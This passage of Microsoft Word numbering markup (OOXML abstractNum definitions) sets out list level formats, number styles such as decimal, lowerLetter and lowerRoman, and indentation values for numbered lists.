    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42CE141A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8D8E814"/>
    <w:lvl w:ilvl="0" w:tplc="F3884E80">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>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9C243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10C5D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D2F97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10CB4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5ADBD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50AE4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7624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5EF75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436F32E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8C407D4"/>
    <w:lvl w:ilvl="0" w:tplc="B3FEA5E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="015EECD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43BB2EEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFDCE60E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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444677F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B504EE6"/>
    <w:lvl w:ilvl="0" w:tplc="3FE8FC90">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A5DA1F48">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="79CCF13A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CBF61C34">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="58BE0206">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DF6CEAE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="20AE3928">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="108C3F82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B2DE79B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="75" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="45B60A72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DDA4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5ED4F3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="842AA336"/>
    <w:lvl w:ilvl="0" w:tplc="5888F4BA">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B68CD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BC868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00FAA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08BAC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3CABB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82FF8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4A311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8430C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467C4F40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05C2597A"/>
    <w:lvl w:ilvl="0" w:tplc="3836ED0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="74429688">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5F326FBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4598649E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="78C80422">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E43A15FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0B3435C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A8649940">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C17410CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="78" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4915772B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="428A1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AF13CAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F948C4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C4A09F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="06BE1F58">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DF00C80A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CF044F9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A5A0688E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6A9C6ADC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D37E17A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="78DACC92">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="88C0BE36">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A9E680EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="81" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D25384B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93280F2C"/>
    <w:lvl w:ilvl="0" w:tplc="D2EEAABC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2700" w:hanging="360"/>
      </w:p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82" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D6F54BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94A622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986B05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ECC4B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ED05178"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47563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4F5833FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06263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FAB28AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7448820A"/>
    <w:lvl w:ilvl="0" w:tplc="2EE6A2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522A0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AEB04030">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C5EC75EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3C922564">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D054B5CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="D10EB008">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AF9C7EA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="500E9D16">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="05EEEE10">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="62A81ECC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="88" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50EA75DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="46C8C1B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1FB0FFC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17904874">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FE20B1B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8898D4FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2D2EC1DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F014B856">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6F688516">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2B92CB5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="89" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="517363A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3CD64CEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A07C3490">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D1B0EDC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="321CAB44">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CB8C698C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7F94C148">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="80BC110C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5CBAC8BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C80E7910">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="90" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="529F6EF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54547C6C"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6BB4333E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2758BC96">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6D34D644">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="68BA3FF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="815C4F9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="62388EA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="119E3668">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="991EAB80">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="91" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="52F07599"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="902A4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2F54AA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B372A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544F1246"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="87508364">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="06FA228E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2346A4F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2E2A7A4E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5FA6CD54">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A94A0AA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F18E7E3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B85C2C84">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="19981FC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="94" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="54662695"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="DD7EB278">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4E988B94">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="643" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="13841EAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6C324A8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0B52BCDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C622BD64">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="538E016C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="054A3DFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C4C07972">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="95" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="54BE516F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
